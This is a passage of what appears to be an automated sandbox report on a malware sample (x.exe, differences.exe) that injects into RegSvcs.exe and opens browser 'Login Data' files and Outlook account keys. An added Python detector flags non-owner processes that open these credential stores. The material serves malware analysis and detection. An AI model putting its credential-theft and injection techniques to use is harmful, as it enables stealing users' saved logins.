                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00473F09 BlockInput,1_2_00473F09
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00403B3A
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00435A7C
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00404B37 LoadLibraryA,GetProcAddress,1_2_00404B37
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0055C594 mov eax, dword ptr fs:[00000030h]1_2_0055C594
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A71130 mov eax, dword ptr fs:[00000030h]1_2_00A71130
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00AB3F3D mov eax, dword ptr fs:[00000030h]1_2_00AB3F3D
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00BF94E0 mov eax, dword ptr fs:[00000030h]1_2_00BF94E0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00BF9540 mov eax, dword ptr fs:[00000030h]1_2_00BF9540
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00BF7EC0 mov eax, dword ptr fs:[00000030h]1_2_00BF7EC0
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_009B1130 mov eax, dword ptr fs:[00000030h]4_2_009B1130
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_009F3F3D mov eax, dword ptr fs:[00000030h]4_2_009F3F3D
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_00A86868 mov eax, dword ptr fs:[00000030h]4_2_00A86868
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_00A87E88 mov eax, dword ptr fs:[00000030h]4_2_00A87E88
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_00A87EE8 mov eax, dword ptr fs:[00000030h]4_2_00A87EE8
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00A51130 mov eax, dword ptr fs:[00000030h]10_2_00A51130
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00A93F3D mov eax, dword ptr fs:[00000030h]10_2_00A93F3D
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00D36CC8 mov eax, dword ptr fs:[00000030h]10_2_00D36CC8
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00D382E8 mov eax, dword ptr fs:[00000030h]10_2_00D382E8
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00D38348 mov eax, dword ptr fs:[00000030h]10_2_00D38348
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00B41130 mov eax, dword ptr fs:[00000030h]12_2_00B41130
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00B83F3D mov eax, dword ptr fs:[00000030h]12_2_00B83F3D
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00CE84B0 mov eax, dword ptr fs:[00000030h]12_2_00CE84B0
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00CE8510 mov eax, dword ptr fs:[00000030h]12_2_00CE8510
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00CE6E90 mov eax, dword ptr fs:[00000030h]12_2_00CE6E90
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,1_2_004580A9
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0042A155
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0042A124 SetUnhandledExceptionFilter,1_2_0042A124
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00AB1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00AB1361
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00AB4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00AB4C7B
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_009F1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_009F1361
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_009F4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_009F4C7B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040CE09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040E61C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00416F6A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_004123F1 SetUnhandledExceptionFilter,5_2_004123F1
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00A91361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00A91361
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00A94C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00A94C7B
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00B81361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00B81361
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00B84C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00B84C7B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtOpenKeyEx: Indirect: 0x140077B9B
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtQueryValueKey: Indirect: 0x140077C9F
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtClose: Indirect: 0x140077E81
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 705008
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AF1008
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_004587B1 LogonUserW
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00464C53 mouse_event
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\subpredicate\differences.exe "C:\Users\user\AppData\Local\subpredicate\differences.exe"
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\subpredicate\differences.exe"
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\subpredicate\differences.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: x.exe, 00000001.00000003.1735418066.0000000004153000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: x.exe | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_0042862B cpuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00417A20 GetLocaleInfoA
Source: C:\Users\user\AppData\Local\Temp\x.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\alg.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST8827.tmp VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST8838.tmp VolumeInformation
                  Source: C:\Windows\System32\msdtc.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\Locator.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\SensorDataService.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\snmptrap.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00434E87
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00441E06 GetUserNameW,1_2_00441E06
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_00433F3A
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_004049A0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

Source: Yara match | File source: 15.2.RegSvcs.exe.2d30ee8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.3ee6458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2a41f6e.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2d30ee8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.3f0f990.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2a41f6e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.5360000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.3ee6458.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2a41086.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.5360000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2d30000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2d30000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.3f0f990.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.3ee5570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2a41086.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: x.exe | Binary or memory string: WIN_81
Source: x.exe | Binary or memory string: WIN_XP
Source: x.exe | Binary or memory string: WIN_XPe
Source: x.exe | Binary or memory string: WIN_VISTA
Source: x.exe | Binary or memory string: WIN_7
Source: x.exe | Binary or memory string: WIN_8
Source: x.exe, 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: Yara match | File source: 15.2.RegSvcs.exe.2d30ee8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.3ee6458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2a41f6e.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2d30ee8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.3f0f990.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2a41f6e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.5360000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.3ee6458.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2a41086.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.5360000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2d30000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2d30000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.3f0f990.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.3ee5570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2a41086.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.2946618374.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2945957784.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
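The rows above record the injected RegSvcs.exe opening Chrome's and Edge's "Login Data" SQLite files and the Outlook profile subkey 9375CFF0413111d3B88A00104B2A6676, which is where Outlook keeps account settings. The check a detection engineer would derive from that is simple: those stores should only be opened by the application that owns them. The script below is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling; it classifies file and registry access records against a per-store owner allowlist. The access records it runs on are constructed here to mirror the report's rows, and the Firefox paths (logins.json, key4.db) and the browser process names are assumptions about normal installations, not facts from this report.

```python
"""Flag credential-store access by processes that do not own the store.

Added example (not from the Joe Sandbox report). Access records are
constructed to mirror the report's "File opened" / "Key opened" rows.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Chromium-based browsers keep saved logins in <User Data>\<profile>\Login Data.
CHROMIUM_LOGIN_DATA = re.compile(
    r"\\(google\\chrome|microsoft\\edge)\\user data\\[^\\]+\\login data$")
# Firefox keeps them in logins.json plus the key4.db key store (assumed layout).
FIREFOX_LOGINS = re.compile(
    r"\\mozilla\\firefox\\profiles\\[^\\]+\\(logins\.json|key4\.db)$")
# Outlook account settings live under this profile subkey (the GUID from the report).
OUTLOOK_PROFILE_KEY = re.compile(
    r"\\windows messaging subsystem\\profiles\\[^\\]+\\9375cff0413111d3b88a00104b2a6676(\\|$)")

# Processes that legitimately open each store (assumed owner process names).
ALLOWED = {
    "chromium_login_data": {"chrome.exe", "msedge.exe"},
    "firefox_logins": {"firefox.exe"},
    "outlook_profile": {"outlook.exe"},
}


@dataclass(frozen=True)
class AccessEvent:
    image: str   # full path of the accessing process
    target: str  # file path or registry key that was opened


def classify_target(target: str) -> Optional[str]:
    """Return the credential-store class of a path/key, or None if it is not one."""
    t = target.lower()
    if CHROMIUM_LOGIN_DATA.search(t):
        return "chromium_login_data"
    if FIREFOX_LOGINS.search(t):
        return "firefox_logins"
    if OUTLOOK_PROFILE_KEY.search(t):
        return "outlook_profile"
    return None


def is_suspicious(ev: AccessEvent) -> Optional[str]:
    """Return the store class when a non-owner process opens a credential store."""
    store = classify_target(ev.target)
    if store is None:
        return None
    if ntpath.basename(ev.image).lower() in ALLOWED[store]:
        return None
    return store


def detect(events: List[AccessEvent]) -> List[Tuple[str, str, str]]:
    """(process basename, store class, target) for every suspicious access."""
    hits = []
    for ev in events:
        store = is_suspicious(ev)
        if store is not None:
            hits.append((ntpath.basename(ev.image), store, ev.target))
    return hits


REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
OUTLOOK_KEY = (r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion"
               r"\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676")

# Constructed records: the first three mirror the report, the rest are benign controls.
SAMPLE_EVENTS = [
    AccessEvent(REGSVCS, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    AccessEvent(REGSVCS, r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    AccessEvent(REGSVCS, OUTLOOK_KEY),
    AccessEvent(REGSVCS, r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security"
                         r"\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll"),
    AccessEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Profile 1\Login Data"),
    AccessEvent(r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
                OUTLOOK_KEY + r"\00000001"),
]

if __name__ == "__main__":
    for proc, store, target in detect(SAMPLE_EVENTS):
        print(f"{proc} opened {store}: {target}")
```

Run as a script it prints three hits, all for RegSvcs.exe. The GAC assembly access and the browser's and Outlook's own opens produce nothing, which is the point: matching on the target alone would bury the signal under every normal browser start.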

                  Remote Access Functionality

Source: Yara match | File source: 15.2.RegSvcs.exe.2d30ee8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.3ee6458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2a41f6e.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2d30ee8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.3f0f990.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2a41f6e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.5360000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.3ee6458.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2a41086.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.5360000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2d30000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2d30000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.3f0f990.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.3ee5570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.2a41086.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket | 1_2_00476283
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket | 1_2_00476747
